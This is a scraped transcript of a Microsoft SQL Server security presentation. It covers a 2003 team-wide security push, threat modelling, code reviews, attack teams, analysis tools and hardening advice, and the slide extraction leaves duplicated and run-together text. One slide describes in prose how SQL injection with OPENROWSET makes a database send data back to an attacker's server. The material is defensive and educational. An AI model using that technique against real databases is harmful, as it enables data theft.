security process & you: sql server case study
DESCRIPTION
Security Process & You: SQL Server Case Study. James Hamilton General Manager SQL Server Webdata Development & Security Architect. Agenda. Risk Escalating Rapidly SQL Injection Demo Case Study: SQL Server Security Push SQL Server Lessons Learned Security Tools & Automation - PowerPoint PPT PresentationTRANSCRIPT
Security Process & You:SQL Server Case Study
James HamiltonGeneral Manager SQL Server Webdata
Development & Security Architect
AgendaRisk Escalating Rapidly
SQL Injection DemoCase Study: SQL Server Security Push
SQL Server Lessons LearnedSecurity Tools & AutomationAdmin, Data Protection, & App DesignSummary
Incidents Reported Industry WideCERT/CC incident statistics 1988 through
2003Incident: single security issue grouping together all impacts of that that issueIssue: disruption, DOS, loss of data, misuse, damage, loss of confidentiality
0100002000030000400005000060000700008000090000
Source: http://www.cert.org/stats/cert_stats.htmlSource: http://www.cert.org/stats/cert_stats.html
Port ScannersBlack HatCommunity Sharing
Know Your Enemy
Brute Force pwd crackers
Dictionary Based pwd crackers
Network Sniffers
De-compilers Debuggers
Cracker Tools
Data Thief Architecture
App. Databas
e
LocalDB
VulnerableApplication
Attack stringForm values
appended with extra SQL statement
SQL-Injected query
Contains an OPENROWSET
statement
SQL injected OPENROWSET statement
causes remote DB to connect back to attackers DB, sending back useful
data
Girish ChanderSQL Server Security PM
Data Thief Demonstration
Author: Cesar Cerrudo
AgendaRisk Escalating Rapidly
SQL Injection DemoCase Study: SQL Server Security Push
SQL Server Lessons LearnedSecurity Tools & AutomationAdmin, Data Protection, & App Design
SQL Injection DemoSummary
Security Push Timeline
PreparationPreparationPhasePhase
SecurityPush
PushFollow-on
3/15/20033/15/2003 5/1/2035/1/203 8/1/20038/1/2003
Push PreparationPush Preparation•Goal full 800 person team Goal full 800 person team productive from startproductive from start
•Identify ComponentsIdentify Components•Complete threat modelsComplete threat models•Complete EducationComplete Education
•Select push start dateSelect push start date•Security planSecurity plan•Security reps from each teamSecurity reps from each team•Set triage barsSet triage bars•Infrastructure set-upInfrastructure set-up
Security PushSecurity Push•5 million+ lines of code reviewed•Two release in service•One more release in dev•100% team focus during push
•Dev, Test, PM, & UE•No other non-security work
•Three pronged approach:•Targeted code reviews•Tools targeting security•Threat driven reviews & testing
Push Prep: CommunicationsLearning from other teams’ experiences
Windows, VS .Net, & IIS preceded SQLTeam readiness critical
Don’t start security push until team is preparedSecurity push plan
Motivation, goals, approach, process, fix bar,…Education plan for teamWeb site set up for general announcements & communication
Push Prep: TrainingSecurity training for every team member
Mandatory training for Architects, PMs, Developers & Testers
Material covered includes:Threat modeling, hacker/cracker tools, black hat community, security development & test tools, attack vectors & defense
Video tape training for new team membersSecurity talks series
more detail on important security related topicsStaying current with evolving threats
On demand webcasts (search on security): <http://www.microsoft.com/usa/webcasts/ondemand/default.asp>
Push Prep: Infrastructure ReadyCross component team to drive push
SQL Security LeadsBug Tracking guidelines detailed
Classification of bugs and threatsSeparate bug tracking DB for tracking file reviews
Tracks code review progress & completenessIdentification of components
228 components; Risk level assessed for eachThreat models for each component
Getting security tools running & building skillsClear fix criteria setTracking progress is critical
12
Security Push Timeline
PreparationPreparationPhasePhase
SecurityPush
PushFollow-on
3/15/20033/15/2003 5/1/2035/1/203 8/1/20038/1/2003
Push PreparationPush Preparation•Goal full 800 person team Goal full 800 person team productive from startproductive from start
•Identify ComponentsIdentify Components•Complete threat modelsComplete threat models•Complete EducationComplete Education
•Select push start dateSelect push start date•Security planSecurity plan•Security reps from each teamSecurity reps from each team•Set triage barsSet triage bars•Infrastructure set-upInfrastructure set-up
Security PushSecurity Push•5 million+ lines of code reviewed•Two release in service•One more release in dev•100% team focus during push
•Dev, Test, PM, & UE•No other non-security work
•Three pronged approach:•Targeted code reviews•Tools targeting security•Threat driven reviews & testing
Push: Threat Modeling Process
Collect Background Information
Model the System
Determine Threats
Use Scenarios
Implementation Assumptions
External Dependencies
External Security Notes
Internal Security Notes
Entry Points
Assets
Trust Levels
Data Flow Diagrams/Process
Models
Identify Threats
Analyze Threats/Determine
Vulnerabilities
• A process to understand document threats to a systemA process to understand document threats to a system• Methodical and completeMethodical and complete• Describes the system’s threat profileDescribes the system’s threat profile
• Goal is to find design level issues before code is writtenGoal is to find design level issues before code is written
Push: Example Data Flow Diagram
Push: Threat ModelingThreats must be understood to build secure systemsEvery spec/design goes through threat analysis
Model of component is created (typically a DFD)Threats categorized based on STRIDESeverity ranked based on DREAD
NOT how hard it is to fix
SS---Spoofing---Spoofing
TT---Tampering of Data---Tampering of Data
RR---Repudiation---Repudiation
II---information Disclosure---information Disclosure
DD---Denial of Service---Denial of Service
EE---Escalation of Privileges---Escalation of Privileges
DD---Damage potential---Damage potential
RR---Reproducibility---Reproducibility
EE---Exploitability---Exploitability
AA---Affected Users---Affected Users
DD---Discoverability---Discoverability
Push: Security SWAT TeamCentral team focused on cross component analysisMembers chosen from different teamsBuild and share security expertiseOverall Approach:
Met on daily basisChoose component based on priority & riskInvite relevant team members for that componentCollectively brainstorm to ferret out cross component threats
Experience: an effective approach:Part of ongoing, regular effort to audit product security
Push: Dead Code RemovalDead code removal
Code hygiene & work reductionWhy maintain & review non-executable code?Code in product might be used in future
Dead code detector built from code coverage tool
Analyzes compiled binariesAutomatically files bugs
One bug per fileBug assigned to owner or last modifier
Push: Code ReviewsThreat model directed & tools driven reviewsCode review teams set up
Typically, 2 developers and 1 test at leastCode Review driver not code ownerTester files bugs & scribe (some teams rotated roles)
Code Review Experience:Teams progressively became more efficientFirst 90 minutes are the most effectivePass of code by reviewer prior to code review helpedPresentation by code owner was very helpfulAveraged 800-1200 lines reviewed per team per day
Push: Analytical Security Testing
Decompose the app (threat model driven)Identify interfacesEnumerate input points
SocketsPipesRegistryFilesRPC (etc)Command-line argsEtc.
Enumerate data structures
C/C++ struct dataHTTP bodyHTTP headersHTTP header dataOther protocol headersQuerystringsBit flags
Attack all data structures, wire formats, and input data
A Testing method that simulates how A Testing method that simulates how an attacker operatesan attacker operates
Push: Attack Team
Red Team: Microsoft-wide ethical cracking group50-50 split
Reactive: analysis of reported bugsProactive: security reviews
Both formal and informal security reviewsFormal reviews by risk exposureGreater exposure, deeper the review
Analytical Security TestingAdvanced fuzz & data mutation tools developed
21
Security Push Timeline
PreparationPreparationPhasePhase
SecurityPush
PushFollow-on
3/15/20033/15/2003 5/1/2035/1/203 8/1/20038/1/2003
Push PreparationPush Preparation•Goal full 800 person team Goal full 800 person team productive from startproductive from start
•Identify ComponentsIdentify Components•Complete threat modelsComplete threat models•Complete EducationComplete Education
•Select push start dateSelect push start date•Security planSecurity plan•Security reps from each teamSecurity reps from each team•Set triage barsSet triage bars•Infrastructure set-upInfrastructure set-up
Security PushSecurity Push•5 million+ lines of code reviewed•Two release in service•One more release in dev•100% team focus during push
•Dev, Test, PM, & UE•No other non-security work
•Three pronged approach:•Targeted code reviews•Tools targeting security•Threat driven reviews & testing
Follow-on: What was learned?Set realistic schedulesGet training done before startingInvest in tools early & aggressivelyClearly identify system components earlyCode Reviews:
Provide guidelines & goals for each reviewSecurity focus improved overall system quality
Cross-component interactions better understoodImproved both functional & penetration testing
Define an unambiguous exit criteriaClear progress tracking metrics requiredProcess sometimes interferes with progress
AgendaRisk Escalating Rapidly
SQL Injection DemoCase Study: SQL Server Security Push
SQL Server Lessons LearnedSecurity Tools & AutomationAdmin, Data Protection, & App Design
SQL Injection DemoSummary
Development ToolsEngineers good at finding specific vulnerabilities
Innovation requiredNot good at reliably finding all instances of a specific bug class
Millions of lines of codeFocus on tools to supplement manual efforts
Tools that can help identify issues in codeManaged code part of the answer
Development tools used:PREFIX & PREFASTFXCOPCompiler options: /GS, SAFESEHOS Level support: NOEXECUTE
…CHAR buff[MAX_PATH];GetWindowsDirectory(buff, sizeof(buff));SetCurrentDirectory(buff, sizeof(buff));
…CHAR buff[MAX_PATH];GetWindowsDirectory(buff, sizeof(buff));Warning: Failure to check return value
GetWindowsDirectory can fail in low-memory situationsSetCurrentDirectory(buff, sizeof(buff));
Sample Prefast Defect
Example Defect ClassesResource Leakage
Leaking Memory/Resource
Pointer Management
Dereferencing NULL pointer Dereferencing invalid pointer Dereferencing or returning
pointer to freed memory
Illegal State Resource in illegal state Illegal value Divide by zero Writing to constant string
Memory Management Double frees Freeing pointer to non-allocated
memory (stack, global, etc.) Freeing pointer in middle of
memory block
Initialization Using uninitialized memory Freeing or dereferencing
uninitialized pointer
Bounds violations Overrun & Underrun Failure to validate buffer size
• Managed code avoids many of these issues without post-authoring analysis tools
AgendaRisk Escalating Rapidly
SQL Injection DemoCase Study: SQL Server Security Push
SQL Server Lessons LearnedSecurity Tools & AutomationAdmin, Data Protection, & App DesignSummary
Application & DB AdministrationBasic security practices:
Automated enterprise software inventoryRun MBSA frequentlyApply latest patches Use Windows Update or Software Update Service
Audit authentication success & failures at all tiersCorporate security policy with periodic audit
Senior security Czar with ability to drive changeEmergency response & disaster recovery plansSmall admin group
Min privilege & strong passwords enforced on all
Data Protection & App. DesignData Protection:
Hot standby: Clustering, log shipping, or DB Mirroring (Yukon)Frequent backups: Offsite with media encryptionOffline, automated, non-production test systems
Encrypted channels for transferring sensitive informationUse integrated security with strong passwordsIsolate Services
Do not install services on domain controllerServices should run under low privileged accounts (not shared)Mid-tier/data-tier isolation with multiple firewallsSurface area reduction: remove/disable unneeded services
No direct access to data-tierTwo-tier client-side doesn’t work – Security in data tier
Apps that “hide” DB passwords in client tier don’t workAccess only via carefully reviewed mid-tier codeValidate all user input
SummaryThreat profile increasingSQ Security Push case study:
Communication, Training, Infrastructure & tools, Goals & exit criteria
Security Tools and Techniques:Threat models, Security SWAT team, Code reviews, Analytical security testing, Attack Team
Application & DB Admin Data Protection & Application Design
ResourcesMicrosoft Security and Privacy site
http://www.microsoft.com/security/SQL Security White paper
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/sql/maintain/security/sp3sec/Default.aspMBSA Home
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/tools/mbsahome.asp
TITLETITLE
Microsoft Windows 2000 Security Technical ReferenceMicrosoft Windows 2000 Security Technical Reference
Writing Secure Code, 2/eWriting Secure Code, 2/e
Building Secure Microsoft® ASP.NET Applications Building Secure Microsoft® ASP.NET Applications
Microsoft